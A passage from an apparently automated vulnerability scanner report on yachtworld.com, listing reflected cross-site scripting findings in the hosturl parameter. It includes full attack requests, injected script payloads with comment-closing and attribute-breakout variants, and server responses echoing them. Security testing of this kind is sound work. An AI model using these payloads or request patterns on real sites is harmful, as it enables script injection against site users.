User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:49:56 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding1b16a<script>alert(1)</script>8b6edeb2d0e/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding1b16a<script>
...[SNIP]...

3.319. http://www.yachtworld.com/clarkslanding/clarkslanding_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/clarkslanding_1.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 9db70--><script>alert(1)</script>c4a8e195ae7 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /clarkslanding/clarkslanding_1.cgi?company=clarkslanding&limit=50&type=&new=&units=Feet&hosturl=clarkslanding9db70--><script>alert(1)</script>c4a8e195ae7&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:50:11 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>c4a8e195ae7/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding9db70-->
...[SNIP]...

3.320. http://www.yachtworld.com/clarkslanding/clarkslanding_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/clarkslanding_2.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 35706<script>alert(1)</script>b0bead5a2da was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clarkslanding/clarkslanding_2.cgi?company=clarkslanding&limit=50&type=&new=Used&units=Feet&hosturl=clarkslanding35706<script>alert(1)</script>b0bead5a2da&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:49:06 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding35706<script>alert(1)</script>b0bead5a2da/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding35706<script>
...[SNIP]...

3.321. http://www.yachtworld.com/clarkslanding/clarkslanding_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/clarkslanding_2.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload dc7ce--><script>alert(1)</script>0dfd462890c was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /clarkslanding/clarkslanding_2.cgi?company=clarkslanding&limit=50&type=&new=Used&units=Feet&hosturl=clarkslandingdc7ce--><script>alert(1)</script>0dfd462890c&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:49:10 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>0dfd462890c/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingdc7ce-->
...[SNIP]...

3.322. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/clarkslanding_3.cgi

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7047b><script>alert(1)</script>8fbd77f715f was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clarkslanding/clarkslanding_3.cgi?company=clarkslanding&limit=50&type=&new=New&units=Feet&hosturl=clarkslanding7047b><script>alert(1)</script>8fbd77f715f&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:49:08 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding7047b>
...[SNIP]...
<a href=/core/listing/video_gallery.jsp?boat_id=2160432&hosturl=clarkslanding7047b><script>alert(1)</script>8fbd77f715f&&ywo=clarkslanding&&ybw= onClick="return popup(this, 'notes')">
...[SNIP]...

3.323. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
